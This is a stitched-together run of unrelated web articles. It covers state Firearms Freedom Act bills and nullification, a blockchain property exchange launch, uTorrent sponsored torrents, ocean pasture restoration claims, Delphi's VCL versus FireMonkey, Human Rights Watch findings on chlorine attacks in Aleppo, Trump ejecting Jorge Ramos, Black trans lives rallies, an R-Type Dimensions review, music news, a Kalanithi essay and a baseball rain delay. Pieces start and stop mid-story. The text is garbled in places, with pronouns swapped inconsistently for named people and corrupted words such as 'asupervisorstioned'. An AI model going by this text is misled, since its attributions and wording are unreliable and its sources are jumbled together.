But Garneau's platform won't attract meaningful attention if he's dismissed as unable to rouse themselves to a political fight. “I'm a calm person,” they say. “It has drawn some people to conclude, ‘He doesn't have the killer instinct.' I do.” It's a qualification that doesn't appear yet on Garneau's long resumé, but might be added if, somehow, they pull off a leadership upset.
Michael Boldin
Tenth Amendment Center
Wednesday, January 27th, 2010
Introduced in the State Senates of both Colorado and South Dakota last week is a bill known as the “Firearms Freedom Act.” If passed, the bill would make state law that “any firearm, firearm accessory, or ammunition that is manufactured commercially or privately in the state and that remains within the borders of the state is not subject to federal law or federal regulation, including registration, under the authority of Congress to regulate interstate commerce.”
This now makes Firearms Freedom Acts already passed in Montana and Tennessee, and currently introduced in these 21 states: Alabama, Alaska, Arizona, Colorado Florida, Georgia, Kentucky, Michigan, Minnesota, Missouri, New Hampshire, Ohio, Oklahoma, Pennsylvania, South Carolina, South Dakota, Texas, Utah, Virginia, Washington, and Wyoming.
According to Gary Marbut of the Montana Shooting Sports Association and author of the original bill that was introduced in Montana, “It's likely that FFAs will be introduced soon in West Virginia, New Mexico, Idaho, Kansas, Arkansas, Louisiana, North Carolina and maybe elsewhere”
South Dakota's Senate Bill 89 (SB89) was introduced by State Senator Rhoden, and has 22 Senate co-sponsors and 44 House co-sponsors.
Colorado's Senate Bill 092 (SB10-092) was introduced by State Senator Schultheis and has 9 Senate co-sponsors and 7 House co-sponsors.
CLICK HERE – to view the Tenth Amendment Center's Firearms Freedom Act Tracking Page
UPDATE, 01-26-10
The principle behind such legislation is nullification, which has a long history in the American tradition. When a state ‘nullifies' a federal law, it is proclaiming that the law in question is void and inoperative, or ‘non-effective,' within the boundaries of that state; or, in other words, not a law as far as the state is concerned.
But nullification is more than just a mere rhetorical statement or a resolution affirming the position of the legislature. To effectively nullify a federal law requires state action to prevent federal enforcement within the state.
Implied in any nullification legislation is enforcement of the state law. In the Virginia Resolution of 1798, James Madison wrote of the principle of interposition:
That this Assembly doth explicitly and peremptorily declare, that it views the powers of the federal government, as resulting from the compact, to which the states are parties; as limited by the plain sense and intention of the instrument constituting the compact; as no further valid that they are authorized by the grants enumerated in that compact; and that in case of a deliberate, palpable, and dangerous exercise of other powers, not granted by the said compact, the states who are parties thereto, have the right, and are in duty bound, to interpose for arresting the progress of the evil, and for maintaining within their respective limits, the authorities, rights and liberties appertaining to them.
In their famous speech during the war of 1812, Daniel Webster said:
“The operation of measures thus unconstitutional and illegal ought to be prevented by a resort to other measures which are both constitutional and legal. It will be the solemn duty of the State governments to protect their own authority over their own militia, and to interpose between their citizens and arbitrary power. These are among the objects for which the State governments exist”
Here Madison and Webster assert what is implied in nullification laws — that state governments not only have the right to resist unconstitutional federal acts, but that, in order to protect liberty, they are “duty bound to interpose” or stand between the federal government and the people of the state.
In similar proposals, some legislators around the country have begun adding penalties – ranging from misdemeanors to felony charges – for federal agents, too. Other legislators have already introduced what's known as the “State Sovereignty and Federal Tax Funds Act” which would require the state to interpose against the IRS and withhold tax funds from D.C. Click here to read more about this proposal.
Even without such specific penalties listed, I see this as an important step in the right direction.
This article was posted: Wednesday, January 27, 2010 at 5:06 am
Print this page.
Infowars.com Videos:
Comment on this article
ADVERTISEMENTS
Share with:
For the first time, UK property can become a globally tradable asset on a peer-to-peer platform which utilises Blockchain technology. TrustMe, a Blockchain applications company, is aiming to revolutionise the global real estate market by allowing the fractional trading of individual properties using ‘asset backed certificates' on linked, Bitcoin denominated, global property exchanges.
advertisement
TrustMe's whitepaper, released today, details the launch of the TrustMe Property Exchange (‘TPX') Limited and Blockchain Land Registry (‘BLR') Limited, which will enable homeowners to trade shares (‘property certificates') in their property on an open market as a new type of tradeable asset-class. Clients on the property exchanges will be able to purchase up to 49% of the value of a property or residential home with Bitcoin or fiat currency, whilst the 51% owner-occupier continues to live in and manage the property.
The first exchange will be rolled-out in London in October, with parallel TrustMe Property Exchanges launching shortly in Toronto and New York. TrustMe is due to announce other cities over the next 3 months and will establish regulatory compliance in each region it operates in.
London is the first choice for the location of the initial exchange, as it is hosted to a buoyant £2 trillion property market and has well established property laws, rights and processes.
The capital is already a popular location for many international investors seeking to acquire property, however, TrustMe also wants to ‘democratise' ownership by removing the capital threshold that had previously restricted the owning of property to a privileged few. It wants to open-up the asset class using Bitcoin denominated, Blockchain enabled, global property exchanges to make property investment an attainable global investment choice for the many, not just the few.
Antony Abell, Co-Founder & Managing Director of TrustMe commented:
“The London property market, which has, for many people, long been prohibitively expensive, needs to be democratised. The TrustMe Property Exchanges will allow existing homeowners to unlock the value of their own house or properties and to use these assets as a form of stored liquid wealth, similar to a 30-90 day bank account, by trading as much or as little of their asset as they wish in an efficient, transparent and auditable manner.
Abell continued:
“It has only been the recent advent of the public Blockchain that has enabled the trust that people need to have to be able to allow the most valuable assets that most will ever have in their lives to be leveraged in this way.”
For full details on the TrustMe Property Exchanges, please visit http://www.u-trustme.com/whitepapers.html to register for and download the latest whitepaper.
BitTorrent Inc, the parent company of uTorrent, is backpedaling on its decision to force advertisements on users of the popular file-sharing client. While the upcoming uTorrent release will still include "sponsored torrents", users will have the option to turn these off if they don't wish to see them. In a statement the company stresses that they will continue to experiment with new revenue models to support the development and innovation of file-sharing software.
Last weekend we broke the news that uTorrent will soon become ad-supported.
The ads will come in the form of sponsored torrents through which advertisers can reach uTorrent's user base of 125 million active users worldwide.
Along with the announcement BitTorrent Inc. asked users to voice their opinions on the decision, and in the days that followed dozens did just that. While these commenters represent a minuscule fraction of the total number of uTorrent users, their feedback was both negative and fairly unanimous.
“An absolute disgrace. uTorrent used to be an excellent lightweight client with some great features, now its just a bloated and buggy piece of crap which is now going to be bundled with adware,” one user said.
“You were great until a short time ago. Now you are just turning into a bloated mess like all the others. Whoever the genius was to think including ads in your pretty GUI would be a good idea should be gently hung with barbed wire,” another added.
Although these sentiments might not necessarily represent those of the majority, it did motivate BitTorrent Inc. to rethink its decision to force ads onto users.
Today, the company announced that they will give users the ability to opt-out of the sponsored torrents when the initial version is released.
“We've long contemplated an opt-out mechanism for the new offers and advertisements we will be experimenting with. Given all that's been said here, we've decided to release the initial version with an opt-out mechanism. Users should have the choice to opt-out, and we will provide them with ways to do so,” said BitTorrent CEO Eric Klinker.
According to Klinker it was never their intention to merely cash in on ads. The extra revenue will be used to improve current and future file-sharing technology.
“Opt-in offer experiences also help us bring new levels of investment; not just to the uTorrent client, but also to future iterations of peer-to-peer technology. In other words: experiments like this can help prove to the world that there is a legitimate third way in digital distribution.”
“Experiments like this help us give the distributed technology that we all believe in a fighting chance,” Klinker adds.
BitTorrent Inc has grown explosively in recent years, both in terms of revenue and employees. Current annual revenue is estimated at somewhere between $15 and $20 million and the company is backed by millions in venture capital. By adding sponsored torrents the company will be able to expand even further in the years to come.
This is not the first time that a group of uTorrent users has lashed out against BitTorrent Inc for changes the company made to their flagship software. As is the case for all software, there will always be people who reject change. However, this hasn't stopped new users from adopting the company's products.
With its uTorrent and BitTorrent clients the San Francisco company currently has a dominating market share of over 75%, which translates into more than 150 million active users a month. uTorrent has experienced the most spectacular growth by multiplying its active monthly users fivefold to 125 million in less than 4 years.
Update: In a separate forum post BitTorrent responds to accusations that uTorrent has become bloatware. The company is also considering a lighter version of uTorrent, but these plans are not concrete yet.
“We will be removing Apps in a near-future release because they've not been a success among our user base worldwide. Similarly, we will evaluate other existing features. We know that not every one of our features is a success, and our goal is to ship a slim base product with only those features users like and use.”
“Beyond this, we hear the calls among many of you for a µ that is smaller and meaner than the current µ. Something like 1.6, 2.0 or similar. Over the past year, we've discussed various paths to getting there and are taking this request seriously.”
Subsidies paid to fishing fleets by their government often pays for 60% of the fuel cost.
Without these privateers' subsidies the world's catch would be a fraction of what it is today.
For a mere 1% of these privateer subsidies the world's ocean pastures could be sustainably restored to historic health and abundance.
Fleets of ever larger and technologically advanced fishing boats are racing to see who can catch the last “million dollar tuna” or myriad other ocean fish before they become so rare that even with massive fuel subsidies they will be too costly to pursue. These fleets are today's Privateer, their pirate-like crews and owners paid rich bounties by their governments to show the flag and sink the competition.
To the victor go the swaggering spoils. Nations of the world pay out $27 billion subsidizing their fishing fleets, according to a report by the Global Ocean Commission. This while the total value of the world marine catch is only $79 billion (FAO 2012 report). What other industry commands such a subsidy? All the while ocean fish populations are steadily collapsing.
There is a better way
A better use for some of this flag flying swag would be for a tiny fraction of these subsidies to fund ocean pasture restoration. Our solution is dirt cheap! For a cost of mere tens of millions per year, not the tens of billions of present industry subsidies, the job of bringing billions of additional fish back to sustainable abundance into the nets and onto the table can be rapidly and sustainably accomplished.
Within just a few years, we can bring back the fish and supply all of the world's fishing fleets with an ocean restored to its former abundance. Our work of 2012 is delivering hundreds of millions for additional fish to the regions catch today. So as popular as blaming over-fishing for the decline in fish production, the real reason behind declining catch is the collapse of ocean pastures.
Like any pasture as the grass (or plankton in the oceans) disappears so does the livestock. (Dust in the wind rpt.) By restoring and reviving ocean pasture health the need for fuel subsidies will fall as fishing becomes once again a profitable free enterprise. Fishing communities will be revitalized as billions of fish swim into the nets and onto the plates of people everywhere.
We've proven it just works!
Bear with me here's some of the Global Ocean Commission bad news (the good news follows).
Such fleets of highly subsidized privateer fishing companies are also rightly described in economic parlance as zombies—unprofitable companies that will surely fail without massive government aid to keep them afloat. Governments are using them to keep fish prices low and to preserve their fleets and fishermen and to have their flags flying when the last fish of the ocean fish are caught.
But at what cost to the ocean.
In the case of the global high-seas bottom-trawl fleet. The highliner nations with the top 12 catches bunker these particularly harmful monsters with $152 million a year in fuel, worth a quarter of the value of the fish they catch. Fishing deep is high cost and inefficient and these marginally economic boats typically earn a meager 10% profit. They simply could not stay in business if not for their government privateer purses.
Governments are desperately afraid of cutting bait on these fishing industry subsidies because of the feared impact on jobs and local politics. In 2006 Spain choose to keep fishing and increased its fuel subsidy by 60% when fishermen blockaded its Mediterranean ports protesting high fuel prices. But the captains and the ships lion sized share of the money didn't go to the common fisherman. These big boats and recipients of the maximum subsidies are not typically large employers: GOC reports that the biggest vessels catch 65% of all marine fish, while employing only 4% of fishermen.
Governments of 200 years ago choose to stop paying privateers to fly their flags and wage economic war. Those pirate ships became ships of commerce. Today governments can easily afford and almost immediately restore and revive the oceans and in doing so make those zombie ships honest vessels in a world with sufficient fish for all.
How To Bring Back Billions Of Fish, Feed The World's Hungry – Ocean Pasture Restoration Repurposes Billions Of Tonnes Of CO2 Into Ocean Life
In 2012 after many years of development work my company Ocean Pastures completed a commercial-scale pilot project designed to restore and replenish a vital ocean salmon pasture in the N.E. Pacific. Ocean Pastures provided the technology, methodology, and scientific and engineering expertise via a limited technology license and other guiding business agreements with the Haida Salmon Restoration Corporation. It Just Works!
THE FISH CAME BACK THE VERY NEXT DAY
Frequently when I am talking about the VCL or FireMonkey I get some of these common questions:
Is VCL deprecated?
Which is better FMX or VCL?
If I am starting a new app today, should I use VCL or FMX?
The first is easy to answer, the other two are a little harder. The VCL (or Visual Component Library) is NOT depreciated, nor will it be any time soon. As long as there is Windows and the Windows API, there will be VCL. Just recently in Marco's Windows 10 Webinar they said “VCL is the best library for Windows desktop development and fully embraces Windows 10.”
The VCL gets new components, features and bug fixes frequently, but maybe not as often as FireMonkey. The reason is the VCL is a mature framework, while FireMonkey has been going through a lot of growth the past few versions (although it has stabilized a lot recently, and is reaching a more mature status.)
So which is better, and which to use? There isn't a straightforward answer, but instead I can tell you the advantages of each, and you can make an educated choice for your next project.
Visual Component Library (VCL)
The VCL was release with the first version of Delphi. It is mostly a thin wrapper over the Windows API controls, but also includes a lot of owner draw controls. It uses GDI, Windows Handles and Windows Messages. This makes it subject to the same behavior as 90% of the other windows applications out there. If you want to you can inject a VCL button from your app into another app, or sniff messages sent to a different app and redirect them into yours.
As I said earlier, the VCL is mature, and so is the 3rd party component space. There are thousands of high quality VCL components, controls and libraries out there. Probably the most notable are the grids. The VCL grids are the best in the industry, and for good reason, our technology partners were making grids for the VCL before any other platforms had the idea of 3rd party controls. So if you want the best grid on the planet, you will probably use the VCL (although the FireMonkey grids are gaining fast).
Because VCL is mostly a thin wrapper on the Windows API, VCL based applications are much smaller than FireMonkey applications. Anymore this usually isn't a huge deal with fast download speeds and huge hard drive sizes. But if you need a really small lightweight application, then VCL might be a good choice.
Because VCL has been around a while, you may have some existing VCL code that you want to integrate into your application. You could use a utility like Mida converter to convert it to FireMonkey, or something like Monkey Mixer or TFireMonkeyContainer to mix FireMonkey with VCL.
Generally if I am building a simple grid intensive application that I know will only run on Windows, then I find myself using VCL. Or if I need to leverage a specific 3rd party control, or Windows API feature that requires Windows messages. This is less and less frequent though.
FireMonkey Cross Platform Framework (FMX)
As FireMonkey is a newer framework you tend to see it covered more. A lot of people are still learning how to use it, and how to tackle cross platform development. The main advantage of FMX is that it is designed from the ground up to be a cross platform framework. It lets you design a single user interface that runs and looks great on Windows, iOS, macOS and Android. But that isn't the only reason to use FireMonkey.
FireMonkey is based on the latest GPU frameworks: DirectX for Windows and OpenGL elsewhere. It supports both 3D and 2D rendering models, both of which are hardware accelerated. If you want to have some powerful graphic effects or 3D, then FireMonkey is probably going be your first choice. There are some really powerful 3D engines as well as some great graphics effects libraries for VCL, but FireMonkey has these ideas baked into it's core.
FireMonkey is also a lot more flexible. You can embed any control in any other control with FireMonkey. This ability to build composite controls turns the smaller set of controls it includes into a much more robust set of controls. Also there are animations and effects that let you build fantastic, rich user interfaces with very little effort.
VCL has a respectable set of containers and alignments, but FireMonkey has many, many more, and again they are much more flexible. Another big difference is FireMonkey uses a single precision floating point number instead of an integer in laying out the controls. Much higher precision, but typically subpixel precision doesn't buy you much. Where it does make a difference is when you scale on FireMonkey since it supports multiple pixel densities.
The most obvious reason to use FireMonkey is if you are currently planning to target multiplatform, or there is a possibility you might in the future (which is a pretty high likelihood). The other reasons are you want a more flexible UI or you plan to take advantage of 3D or other effects FireMonkey provides.
Conclusion
In summary VCL is amazing, and continues to get fixes and new features. It is a better user interface framework than any other out there, except maybe FireMonkey. So use VCL when you are only targeting Windows and don't need the 3D, effects or flexibility of FireMonkey. Use FireMonkey when you are going multiplatform, or you new some of FireMonkey's flexibility especially when working around graphics.
Both frameworks will be around for a while. As you use them both you will get a better feel for which to use in each situation. I'd love to hear your feedback about when you choose which framework.
Share this: Print
Facebook
LinkedIn
Reddit
Twitter
Email
United Nations (United States) (AFP) - Syrian government forces carried out at least eight chemical attacks during the final weeks of the battle for Aleppo, killing nine people, among them four children, and injuring hundreds more, Human Rights Watch said Monday.
The rights group said it interviewed witnesses, collected photos and reviewed video footage indicating that chlorine bombs were dropped from government helicopters during the offensive from November 17 to December 13.
Around 200 people were injured by the toxic gases used on opposition-controlled areas of the northern city, according to HRW.
One of the deadliest bombings hit the neighborhood of Sakhur on November 20, killing six members of the same family including four children whose lifeless bodies were shown on a video taken by the Shabha press agency.
The report detailed attacks on a playground, clinics, residential streets, and houses that left scores of people struggling to breathe, vomiting and unconscious.
"The chemicals would affect the children most severely... they inhale these smells and they end up suffocating," said a first responder quoted in the report.
The attacks, which may have involved as many as three helicopters operating jointly, took place in areas where government forces were poised to advance, said the rights group.
"The pattern of the chlorine attacks shows that they were coordinated with the overall military strategy for retaking Aleppo, not the work of a few rogue elements," said Ole Solvang, HRW's deputy emergencies director.
For five of the attacks, HRW reviewed photographs or video footage of remnants of at least seven yellow cylinders that carried warnings that they contained gas.
The actual number of chemical attacks could be higher, said the group, adding that journalists, medical personnel and other credible sources had reported at least 12 attacks in that period.
HRW was able to verify eight attacks involving chlorine bombs.
- No evidence of Russian role -
Syrian forces, backed by Russia, launched an offensive in November to seize east Aleppo, a key battleground in Syria's nearly six-year war, and the regime announced on December 22 that it had taken full control of the city.
The group said there was no evidence that Russia was directly involved in the chemical attacks, although Russian aircraft did play a role in the military offensive against opposition fighters in east Aleppo.
"We don't have any evidence that Russia was directly involved in any of these attacks or that it was aware", said Louis Charbonneau, HRW's UN director.
"What we do know is that Russia is a close military ally of the Syrian government. It is involved on the ground. It was involved in the battle for Aleppo."
"At the very least, they needed to take measures to ensure that these weapons were not being used," Charbonneau told a news conference.
Chlorine use as a weapon is banned under the Chemical Weapons Convention, which Syria joined in 2013 under pressure from Russia.
The use of chlorine bombs as an indiscriminate weapon could amount to war crimes.
Human Rights Watch urged the Security Council to impose sanctions on senior leaders in the chain of command, but such a move would likely be vetoed by Russia.
France and Britain are pushing the Security Council to ban the sale of helicopters to Syria and impose the first UN sanctions against Syrian military leaders and entities tied to chemical weapons development.
A joint investigation by the United Nations and the Organization for the Prohibition of Chemical Weapons (OPCW) found that several units of the Syrian army had used toxic weapons against three villages in northern Syria in 2014 and 2015.
It was the first time an international probe blamed President Bashar Al-Assad's forces after years of denial from Damascus.
Russia, however, has cast doubt of the panel's findings, saying there were not strong enough to warrant sanctions.
A new report by the UN-OPCW joint investigative panel is expected to be released later this month. HRW has sent its findings to the panel.
I'm a big fan of Mark Siegel's in two ways. I loved To Dance, the nonfiction graphic novel they illustrated for their wife. And Gene and I both love First Second Books, the graphic novel publisher for which they are the editorial director. They simply make some of our favorite comics in the world (many of which we have featured in the past). So when our mutual friend Gina Gagliano offered to convince them to draw a guest Unshelved Book Club we were thrilled. And when we saw the result we were blown away. And if Mark didn't strictly follow the directions in terms of length, well, it was easy to forgive him. I hope you enjoy their appreciation of Scott Pilgrim, of which we are also huge fans.
Getty Univision anchor Ramos tossed out of Trump event
Donald Trump sparred with Univision and Fusion anchor Jorge Ramos during a news conference in Iowa on Tuesday, permitting security guards to remove the journalist from their event before allowing them back in and engaging in a sharp back-and-forth on immigration issues.
“You haven't been called on; go back to Univision,” Trump yelled at Ramos after the anchor repeatedly tried to toss questions to Trump despite not being called on.
Story Continued Below
In an interview with POLITICO last week, Ramos suggested he'd attempt to attend a Trump event, after Univision was told more than a month ago that it would not be getting an interview with Trump.
“Yea of course,” Ramos said when asked whether they would ever try to show up to a Trump event and ask them questions. “That's always a possibility, of course. When that happens we'll see how it goes.”
It didn't go well.
Security officers physically escorted Ramos out of the event Tuesday night, with Trump saying it wasn't anything personal. “I don't mind if they come back,” Trump said, adding, “He is obviously a very emotional person.”
Ramos was allowed back in minutes later, and proceeded to pepper the loudmouthed billionaire business person with questions about their comments about “anchor babies,” their plans to build a giant wall along the U.S.-Mexico border, and Trump's assertion that many Mexican immigrants are criminals.
Trump said they plan to deal with immigration problems “in a very humane fashion.”
“I have a bigger heart than you do,” Trump told Ramos.
While Ramos was gone, Trump said they would have been happy to take their questions. They also denied they were the one who had them removed.
“I didn't escort them out. You have to talk to security; you're asking me questions, they just stands up and starts screaming,” Trump said. “Maybe he's at fault also. Somebody walked them out. I don't know where they are, I don't mind if they come back.”
Trump said “I would take their question in two seconds, but they stood up and started screaming.”
Responding to Ramos' questions, Trump said their solution to build a wall along the border is an easy one: “I'm a builder.”
They quickly grew exasperated again at Ramos' questions.
“I can't deal with this,” Trump said, and soon moved to other reporters' questions, though they seemed to suggest to Ramos a future interview. “You and I, we'll talk,” they said.
Ramos is considered one of the most influential Hispanic journalists, with hosting gigs on Univision and Fusion, alongside an outspoken presence on Twitter, where they have called Trump's immigration plan “wrong,” “absurd” and “impossible to achieve.” He, and Univision, have been among the biggest targets of Trump's wrath. Trump sued the network for $500 million after Univision decided to drop Trump's Miss Universe contest over the candidate's comments about Mexican immigrants during their campaign launch. When Ramos tried, via handwritten letter, to invite Trump to sit down for an interview, Trump published the letter on their Instagram account, which included Ramos' personal cellphone number. (The post has since been removed.)
In a statement on Tuesday after the exchange, Fusion CEO and Univision head of news Isaac Lee said: “We'd love for Mr. Trump to sit down for an in-depth interview with Jorge to talk about the specifics of their proposals.”
Black Lives Matter organizers across the country will hold rallies on Tuesday calling attention to the number of black trans women who have been murdered this year. The rallies will be organized and led by organizers who are black and cisgender—men and women whose gender identities matched their sex when they were born.
“Now is a call to action to get cis black people to stand up for black transgender lives,” said Aaryn Lang, a black trans woman based in New York who is calling on Black Lives Matter chapters across the country to organize rallies on Tuesday.
At least 20 transgender women have been killed this year, 14 of them black women. Lang said organizers decided to call on the Black Lives Matter movement to speak out after three black trans women were found dead in the span of a week earlier this month.
“Black trans women have been strategizing with the leaders of this movement but when we get killed there's no outrage. Now is the time to shut it down for black trans lives,” said Lang in a telephone interview on Monday.
BlackLivesMatter.com
The Black Lives Matter movement was founded by three black queer woman who have been explicit about including black trans women in their campaign. “Black Lives Matter affirms the lives of Black queer and trans folks, disabled folks, black-undocumented folks, folks with records, women and all Black lives along the gender spectrum,” reads a sentence on the Black Lives Matter website ‘about me' page.
Currently there are rallies set in five cities: Houston, Dayton, Nashville, Chicago, Columbus, and Washington D.C. Organizers are also encouraging supporters online to participate by using the hashtag #BlackTransLivesMatter on social media.
“We say the names of Mya Hall, Kandis Capri, Elisha Walker, Shade Shuler, Ashton O'Hara, India Clark, Amber Monroe. We say the names of the black trans women whose lives have been cut short and demand that our cisgender family acknowledge that all Black Lives Matter,” said Elle Hearns, Black Lives Matter strategic partner and a coordinator at GetEqual, an LGBT civil rights organization.
Lang said more cities were expected to announce rallies later on Monday. Details about the currently listed events are listed below:
Online: 4:00 EDT on Twitter
Follow hashtags #BlackTransLivesMatter #TransLiberationTuesday on Twitter
Houston:
Wednesday, August 25th at 6:00 CDT
Hermann Park Conservancy
Dayton:
Tuesday, August 25 at 6:00pm EDT
Dayton Courthouse Square in Dayton, Ohio
Nashville:
Tuesday August 25th at 1pm ET
Church Street and 12th Street
Los Angeles:
Tuesday August 25th at 6pm
Pico and Figueroa
Chicago:
Black Trans Lives + Labor
Tuesday at 5:30pm
1255 S Halsted, Chicago, IL
Columbus:
Tuesday, August 25 at 5:00pm EDT
City of Columbus – City Hall
San Francisco
Tuesday, August 25 at 6:00PM PST
Civic Center Plaza
Brooklyn
Tuesday, August 25 at 7:00pm EST
Barclays Center
Washington DC:
Tuesday, August 25 at 6:30pm EDT
Franklin Square (14th & K)
Additional cities have been added since this story was originally published. Locations and times are listed below:
AMHERST, MA
ATLANTA, GA
CHICAGO, IL
CLEVELAND, OH
COLUMBUS, OH
DAYTON, OH
FRESNO, CA
GRAND RAPIDS, MI
LOUISVILLE, KY
NASHVILLE, TN
NEW YORK, NY
PORTLAND, OR
STANFORD, CA
SYRACUSE, NY
TACOMA, WA
WASHINGTON, DC
by Cybermario
Developer: Tozai Games
Publisher: Tozai, Inc.
Platform: Xbox Live Arcade, PlayStation Store
Price: $9.99
Release Date: May 20, 2014 (NTSC), May 21, 2014 (PAL)
R-Type is a fantastic shoot 'em up arcade game created by Irem and was originally released in the year 1987. Several ports were made, including home consoles such as the TurboGrafx 16 and unlicensed carts for the Famicom.
Most recently the classic got a massive overhaul thanks to Tozai Games and returned as R-Type Dimensions, first released for the Xbox Live Arcade back in 2009 and now it's time for the PlayStation Network users to enjoy this fantastic game!
Story
The story begins when… well, which story? We're talking about the 80's and all I needed to know was which buttons i had to press to shoot, plus a large bag of quarters to enjoy the game killing alien invaders!
Actually there is a bit of story, you control a combat fighter named R-9a “Arrowhead”. Because Will Smith and Jeff Goldblum are never here when you need them, you are the last line of defense against these vicious aliens beings known as “Bydo”.
Gameplay
R-Type is one of many shoot 'em up arcade games that spawned in the 80's and is known not only because of intense gameplay, but also for the extreme challenge. Which i'm glad to say remains intact in this remake of the game.
The game offers two game modes, one being Classic and the second is an Infinity Mode. Classic style is pretty much identical to the arcade game everyone knows, every fan of the classic will be delighted with this game mode. Plus you don't need a bag of quarters this time, believe me, i tried and could not find a way to insert a coin in my PS3.
Infinity mode gives you unlimited lives but the difficulty really steps it up a notch! Someone said challenge? So you can expect to die a lot! Worry not, by pressing L2 you can slow down the game quite a bit, this is a lifesaver when you are a in a pinch.
Controls feel nice and responsive, which is a must in a game like this, the tiniest mistake can cost you your last precious life! It is especially frustrating to die due to bad controls.
The graphics are one of the elements to highlight in this version, you can change between 2D and 3D perspectives, both are great. If you do not like the 3D style you can change the perspective right there without having to stop playing, easy peasy, love this feature!The style of the different scenarios, backgrounds and enemy bosses is something every fan of H. R. Giger will love. The artist's influence in the original game can't be denied. As a fan of the movies, the Alien dejavu is something that I personally enjoy.From the classic 8 bit sprites to the new 3d graphics, this will please old and newcomers to the R-Type universe.
Sound
The music is great, classic sound with a stereo surround system sounds perfect and this in the classic 8 bit chip tunes mode, when you switch to the new remastered remixed sound with the 3D effect it's something worth praising.
Downsides
It's really hard for me to find something wrong with a game like this. Of course the game is not for everyone as difficulty can be something that will discourage and frustrate players looking for a more casual experience.
Although the dedication of Tozai games in the remake is noticeable, I wish they would have added a bit of extra storyline, something that make you feel more immersed in the world of R-Type.
Overall
The guys at Tozai Games have done a great job with this. For the fans of the genre you can't go wrong with R-Type Dimensions, you get not only a great remake but two games in one including R-Type and R-Type 2 for the same price, that is a steal!
If you never played the game before, this is a really good time to try it, Classic mode remains strong even after all these years and offers hours of challenging fun. Great for old school fans and newcomers alike.
Giving it an 7.5 out of 10!
Pros:
– Awesome gameplay
– Excellent sound
– Is not Flappy Bird (that's a joke, you dense people)
– Challenging
Cons:
– Can be frustating at times
– Lacks storyline
– Not for casuals
[ 5,369 views ]
Up and coming progressive metallers Toothgrinder release a new music video.
photo by Jonathan Thorpe
Toothgrinder
This past January, New Jersey bandreleased a new album titled. If you missed it, your loss; the effort is a clinic in technical and progressive metal. Basically, Toothgrinder is the youthful rascal at the family reunion -- adventurous and original, but mindful of and inspired by its elder cousins in BTBAM, Meshuggah, Tool, and The Dillinger Escape Plan.Today we're premiering the band's new video for "Blue," a track from the asupervisorstioned album. Toothgrinder says, "'Blue' is one of the more rhythmic songs on the record. It is also one of the few songs in which we chose to apply an alternative tuning, in which added a cool dynamic to the album. It is arguably one of the favorites and the most fun to play live."Check out the video below. Meanwhile, if you haven't already done so, get online and follow Toothgrinder on Facebook
New Order and John Grant are just the tip of the iceberg, it's really great.
Sónar has just released the first names for its annual hedonistic three day electronic music festival, which held on 16, 17, and 18 June 2016. The festival has gained a name for itself since it was founded in Barcelona in 1994 as one of the best festivals in the world.
Sónar now run annual festivals in São Paulo, Bogota, Santiago, Buenos Aires, Reykjavik, and Stockholm. Barcelona, however, will always remain special as it's where it all began.
New Order, John Grant, and Fatboy Slim are among the best known names on the bill but there's also a really rare performance happening too. There will be a European premiere for ANOHNI, a pseudonym for lead singer and composer from Antony and the Johnsons together with Onehotrix Point Never and Hudson Mohawke on stage.
Other highlights include UK bass music producer Kode 9, UK rapper Skepta, and ambient dub from King Midas Sound and Fennesz' recent collaboration.
The festival is split into two main events: Sónar by day is held in the historic heart of the city, and Sónar by night is held at a big modern venue perfectly equipped for raves. Sónar by day highlights include dancehall and reggae icon Congo Natty which will undoubtedly lead to an incredible atmosphere under the intense mediterranean sun.
For more information on Sónar 2016 check here.
Operating on regions of the brain that control language and therefore on “the crucible of identity,” neurosurgeons must consider “what kind of life exists without language” and “what kind of life is worth living.” Because Dr. Kalanithi needed to address these profoundly philosophical questions, they knew that “when there's no place for the scalpel, words are the surgeon's only tool.”
According to Dr. Kalanithi, science organizes empirical and reproducible data; however, it cannot “grasp the most central aspects of human life: hope, fear, love, hate, beauty, envy, honor, weakness, striving, suffering, virtue.” Physicians need resources other than medicine to frame nuanced conversations, for scientific knowledge remains “inapplicable to the existential, visceral nature of human life, which is unique and subjective and unpredictable.”
After the cancer diagnosis, Dr. Kalanithi's oncologist insisted on words, but they wanted numbers: “If I had two years, I'd write. If I had ten, I'd get back to surgery and science.” Yet they came to realize that “getting too deeply into statistics is like trying to quench a thirst with salt water.” Instead, they found in literature a vocabulary to ease the anxiety attendant upon diagnosis. A “seemingly impassable sea of uncertainty parted” when they recalled Samuel Beckett's famous words: “I can't go on. I'll go on.” They convinced them that “even if I'm dying, until I actually die, I am still living.”
It makes perfect sense to me that Dr. Kalanithi completed a master's thesis on Walt Whitman's conceptualization of “the Physiological-Spiritual Man.” They knew that literature provides “the richest material for moral reflection.” Unfortunately, it also makes sense that one of their thesis advisers told them that it would be difficult to find a community in the literary world “because most English Ph.D.s react to science, as they put it, ‘like apes to fire, with sheer terror.'”
Is this one of the reasons the humanities are currently endangered?
Dr. Kalanithi's memoir asks humanists pointed questions about what must be done to make their disciples supple in an engagement with science. Considering issues at the intersection of literature, philosophy and medicine, Dr. Kalanithi also underscores the importance of the medical humanities: a multidisciplinary field that involves artists, humanists, social scientists and scientists in issues related to wellness and sickness.
Mother Nature could wash away any momentum the Kansas City Royals brought home with them to Kauffman Stadium.
Rain is expected to fall steadily in Kansas City, Mo. on Monday, possibly delaying or postponing Game 3 of the American League Championship Series. First pitch between the Royals and Baltimore Orioles is scheduled for 8:07 p.m. ET.
Game 3 of the ALCS is not looking promising. It's expected to rain all day and all night in Kansas City. pic.twitter.com/CqkADXXsab — Jeff Passan (@JeffPassan) October 13, 2014
If Monday's game is rained out, Game 3 would be played Tuesday night with Game 4 following Wednesday afternoon. Game 5, if necessary, would then be rescheduled for Thursday, which is currently penciled in as an off-day.
The Royals have a 2-0 series lead after taking a pair of games on the road at Camden Yards in Baltimore.
The broad swath of GOP control at all levels of government presents a huge opportunity to, as Trump promised, to drain the swamp. Already we have a very real prospect of repealing and replacing ObamaCare, of enacting pro-growth tax reform, rebuilding the military, securing our borders, and, yes, putting the Supreme Court on the right path for generations.
Among the many somewhat surprising visitors to Trump Tower was Texas Sen. Ted Cruz, a former Trump presidential rival with whom unpleasant commentaries were exchanged. Politics does indeed make strange bedfellows and if we have seen anything since November 8 it is that president-elect Trump has proven more magnanimous and less vindictive than both their political opponents and media critics have painted him.
The prospect of restoring and protecting religious liberty and the Second Amendment and reigning in the regulatory excesses of federal agencies is at hand. Ted Cruz, who campaigned with vice president-elect Mike Pence for Trump in Iowa, has pledged to work with Trump on Supreme Court appointments, tweeting after their meeting:
I'm eager to work with the new POTUS to repeal Obamacare, confirm strong #SCOTUS justices & protect the constitutional rights of Americans.
